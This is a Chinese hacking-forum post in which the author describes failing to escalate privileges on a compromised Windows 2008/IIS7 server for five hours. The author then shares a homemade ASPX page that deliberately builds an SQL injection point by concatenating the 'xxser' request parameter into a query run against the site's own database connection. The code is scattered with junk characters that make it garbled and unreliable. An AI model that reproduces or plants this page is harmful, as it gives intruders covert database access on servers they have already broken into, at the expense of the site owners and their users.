昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。4 K' j- z$ A% i, ?& o' z4 ~$ N6 G
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
$ x4 z( S: I# M5 X' S代码量不多,自己写个拉倒了。烦死了。. f& ^. e; ?. `1 f6 D
' e R- a. [- A8 W! h/ y8 {& h7 v& n2 i
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">, l; h: r5 r1 a' N9 E8 \1 K
<html xmlns="http://www.w3.org/1999/xhtml">
% d+ o/ Y$ I# r" F; b; b& e<head runat="server">
6 O+ y) f4 v; H$ g- I, B <title>暗影aspx构造注射专用页面</title>
+ t' k0 p' L( v# Z$ b</head>
) _8 `( j( _3 u$ i9 j. L! N. n<body>
* `6 q% ]% A: ]! |! e$ R& |: h& g <form id="form1" runat="server">
3 k$ r t3 i8 @' i$ z/ G B <div> t- g5 s" Y( X- `& ^
<script language="c#" runat="server">5 {# T+ R' r" V/ W5 J# b9 |
z) }/ L# o( s' q2 x; u3 s9 k
void page_init(object sender, EventArgs e)' E+ o/ O% k3 Q. Z# R, n: }
{
1 I2 p% w: ^: I% H \ * m8 X% g8 J% Q% }' @3 Q4 Q ^4 F
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
# b! h0 M) n" Y7 v 3 E" e: }5 L1 X. }, p
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();0 O+ h# j% @& {
conn.Open();2 b+ J, M9 _) T9 S
. O" z0 s& S' o! V/ m0 i6 w T$ K string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
$ x( y9 d0 V- V2 K# y9 @, O" M- y& |
" |8 ]- X& u+ z& E' L5 d' B System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
0 U% q @9 L" ? int x = command.ExecuteNonQuery();
0 V& [7 }1 H8 {8 o Response.Write(i+"\n");
3 G2 @# E1 l, N Response.Write(x);
a6 r9 I5 V v3 D conn.Close();
4 a, A- [+ ^: p: y* N4 {* b' @ }
1 P. [8 T9 V0 V( \& v4 F
! D R3 p( l* x </script>" s; t- h3 _ Z2 r7 U: r; Y% T
</div> v; I$ v$ Y$ ^ v, ^# g% f
</form>$ {0 ~# c4 }6 ?3 G
</body>! o0 [" D5 u" w- c
</html> e% {' L6 C2 l) f
|
发表于 2013-3-20 21:32:01
收藏
支持
反对